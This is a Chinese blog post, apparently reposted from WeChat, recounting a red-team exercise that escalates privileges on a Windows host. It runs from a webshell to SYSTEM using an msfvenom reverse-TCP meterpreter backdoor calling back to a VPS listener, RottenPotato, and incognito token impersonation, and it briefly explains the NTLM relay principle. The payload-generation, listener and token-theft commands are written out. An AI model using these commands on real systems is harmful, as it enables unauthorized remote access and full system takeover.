记一次HW实战笔记 | 艰难的提权爬坑

admin
admin
admin
102331
文章
87
评论
2020年10月20日18:42:34评论383 views字数 2142阅读7分8秒阅读模式

烂土豆+Metasploit提权

Meterpreter自动提权溢出漏洞模块提权利用MS16-016进行meterprter提权.......利用MS16-075提权(烂土豆)

试了多种方式都没有成功,后来找到了RottenPotato(烂土豆)

Successful!!!!


0x00 前言

  对实战的一次简单整理,也算是对自己的一种收获。(主要还是自己太菜了记一次HW实战笔记 | 艰难的提权爬坑)距离HW的日子越来越近,一些厂商也在为真正HW前做准备。搞一些企业攻防演练,通过在实战中发现自身存在那些问题,避免在实际当中被恶意攻击者利用造成不必要的损失。

扯得有点多...记一次HW实战笔记 | 艰难的提权爬坑  接下来直奔正题,到提权这一步了说明已经拿到shell,怎么拿的就不细说了(@shell小王子记一次HW实战笔记 | 艰难的提权爬坑


0x01 生成后门程序

我是在vps的命令行下直接执行以下命令获得一个针对windows的反弹型木马:

msfvenom -p windows/meterpreter/reverse_tcp lhost={vps监听ip} lport={端口} -f exe -o /tmp/msf.exe

这里我们为生成的木马指定了payload:

windows/meterpreter/reverse_tcp反弹到的监听端地址为你的vps地址监听端口为6666(随意设置监听端口)-f exe -o /tmp/msf.exe 文件输出格式为exe,并保存到路径/tmp/msf.exe

0x02 执行监听

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST vps地址show options

记一次HW实战笔记 | 艰难的提权爬坑


0x03 使用Potato(烂土豆) 窃取system 令牌并模仿令牌

  1. getuid看看自己的当前id,可以看到只是network服务

记一次HW实战笔记 | 艰难的提权爬坑

  1. 然后加载窃取令牌的模块

use incognito  //  用来窃取令牌、模仿令牌

这个模块是用来窃取令牌、模仿令牌的。令牌就相当于Cookie。Windows中有两种令牌,一种是Delegation Token,是为交互式登录(比如登录进系统或者通过远程桌面连接到系统)创建的。另一种是Impersonmate Token(模仿令牌),它是为非交互式会话创建的。

  1. 列出当前令牌(这是已经提权之后的,之前的截图找不到了)

list_tokens -u   //可以看到当前有一个“代表令牌”

记一次HW实战笔记 | 艰难的提权爬坑

  1. 冰蝎上传potato,然后进入自己放potato的目录,执行EXP

execute -cH -f ./potato.exe

记一次HW实战笔记 | 艰难的提权爬坑

  1. list_tokens看一下, 可以看到当前是有了一个SYSTEM权限的 可以模仿令牌

记一次HW实战笔记 | 艰难的提权爬坑

  1. 然后执行窃取令牌的命令

impersonate_token "NT AUTHORITY\SYSTEM"  //这里需要注意一点就是反斜线是两个。

记一次HW实战笔记 | 艰难的提权爬坑

注意这里反斜线是两个。第一次执行提示没找到这个用户令牌。这个原因我估计是令牌失效了,就跟Cookie失效一样。所以再执行一次EXP,然后按↑键重复impersonate_token几次命令。可以看到第二次是成功模仿了用户"NT AUTHORITY\SYSTEM"。

  1. getuid看下自己的当前用户ID,可以看到是SYSTEM 。使用shell命令获得一个交互式cmd shellwhoami 也是成功了

记一次HW实战笔记 | 艰难的提权爬坑

记一次HW实战笔记 | 艰难的提权爬坑


到这里就提权成功了,然后可以进一步横向利用。

0x04 EXP原理浅析

RottenPotato(烂土豆)提权的原理可以简述如下:

1.欺骗 “NT AUTHORITYSYSTEM”账户通过NTLM认证到我们控制的TCP终端。2.对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITYSYSTEM”账户本地协商一个安全令牌。这个过程是通过一系列的Windows API调用实现的。3.模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。


所以,一般从web拿到的webshell都是IIS服务器权限,是具有这个模仿权限的。测试过程中,发现使用已经建好的账户去反弹meterpreter然后再去执行EXP的时候会失败,但使用菜刀、冰蝎(IIS服务器权限)反弹meterpreter就会成功。

烂土豆比热土豆的优点是:

      1.100%可靠      2.(当时)全版本通杀。      3.立即生效,不用像hot  potato那样有时候需要等Windows更新才能使用。


总之,我对这个的理解是通过中间人攻击,将COMNT\SYSTEM权限)在第二步挑战应答过程中认证的区块改成自己的区块获取SYSTEM令牌,然后利用msf的模仿令牌功能模仿SYSTEM令牌。


0x05 参考链接

http://hackergu.com/powerup-stealtoken-rottenpotato/https://www.cnblogs.com/backlion/p/9484950.htmlhttps://www.cnblogs.com/hookjoy/p/12460089.html

以上有说的不对,不全的欢迎大佬们指教记一次HW实战笔记 | 艰难的提权爬坑记一次HW实战笔记 | 艰难的提权爬坑记一次HW实战笔记 | 艰难的提权爬坑

记一次HW实战笔记 | 艰难的提权爬坑关注公众号回复“烂土豆”可直接带回家记一次HW实战笔记 | 艰难的提权爬坑

煎炒炸焖

记一次HW实战笔记 | 艰难的提权爬坑

记一次HW实战笔记 | 艰难的提权爬坑



本文始发于微信公众号(渗透Xiao白帽):记一次HW实战笔记 | 艰难的提权爬坑

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年10月20日18:42:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次HW实战笔记 | 艰难的提权爬坑http://cn-sec.com/archives/163032.html

发表评论

匿名网友 填写信息